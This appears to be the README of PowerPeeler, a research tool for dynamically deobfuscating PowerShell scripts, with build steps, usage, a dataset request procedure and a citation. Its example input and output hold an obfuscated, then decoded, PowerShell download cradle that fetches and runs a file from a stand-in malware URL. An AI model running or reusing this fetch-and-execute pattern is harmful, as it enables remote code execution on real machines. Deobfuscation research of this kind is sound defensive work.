A Precise and General Dynamic Deobfuscation Method for PowerShell Scripts
- conference paper: in coming
- full paper: arxiv
-
Build environment requirement
- base environment: refer to PowerShell official build instruction
- .net core 7.0.101
- pwsh/powershell
-
Runtime environment
- PSScriptAnalyzer(optional, for code formatting)
- Invoke-Deobfuscation(optional, static and dynamic combination)
-
Get the tool
git clone https://github.com/zhengbili/PowerPeeler
Or
git clone https://gitee.com/snowroll/powerpeeler
-
Compile sandbox
cd PowerPeeler pwsh ./build.ps1 -
Tool usage
- Change the directory to prevent some malicious scripts from polluting the current directory:
cd sandbox - Enter special pwsh environments:
../pwsh - Execute anti-obfuscation scripts in the special pwsh environment
../Deobfuscation/deob.ps1 --SettingType [Simple|Analysis|SemanticAnalysis] --InputPath InputFileLocation --OutputPath OutputFileLocation [-cmd] [-log]
-st --SettingTypedeobfuscation mode, with several presets, the code can be modified yourself -ip --InputPathinput file location -op --OutputPathoutput file location -cmd --IsCmdcmd one-line mode -log --SaveLogsave log - Change the directory to prevent some malicious scripts from polluting the current directory:
../pwsh ../Deobfuscation/deob.ps1 -ip in.ps1 -op out.ps1
-
in.ps1
Ie`X ("{2}{0}{1}" -f 'ost h', 'ello', 'write-h') $xdjmd = 'aAB0AHQAcABzADoALwAvAHQAZQBzAHQALgBjAG' $lsffs = '8AbQAvAG0AYQBsAHcAYQByAGUALgB0AHgAdAA=' $sdfs = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($xdjmd + $lsffs)) .($psHoME[4]+$PShOmE[30]+'x') (Ne`W-oB`JeCt Net.Web`C`lient).downloadstring($sdfs)
-
out.ps1
Write-Host ([string]'hello') $xdjmd = ([string]'aAB0AHQAcABzADoALwAvAHQAZQBzAHQALgBjAG') $lsffs = ([string]'8AbQAvAG0AYQBsAHcAYQByAGUALgB0AHgAdAA=') $sdfs = ([string]'https://test.com/malware.txt') .'Invoke-Expression' (New-Object ([string]'Net.WebClient')).DownloadString(([string]'https://test.com/malware.txt'))
If you want the datasets (D-Script and D-Cmdline), please send me an email. My email address is chaihuajun@qianxin.com. There are some requirements for the email as follows.
- You need to send me an email with a copy to both my mentor yinglingyun@qianxin.com and your mentor.
- In the body of the email, you need to state the purpose of the dataset request and the use of the dataset.
- Moreover, you need to clearly indicate that the results generated by the dataset will cite our paper.
@misc{li2024powerpeelerprecisegeneraldynamic,
title={PowerPeeler: A Precise and General Dynamic Deobfuscation Method for PowerShell Scripts},
author={Ruijie Li and Chenyang Zhang and Huajun Chai and Lingyun Ying and Haixin Duan and Jun Tao},
year={2024},
eprint={2406.04027},
archivePrefix={arXiv},
primaryClass={cs.CR},
url={https://arxiv.org/abs/2406.04027},
}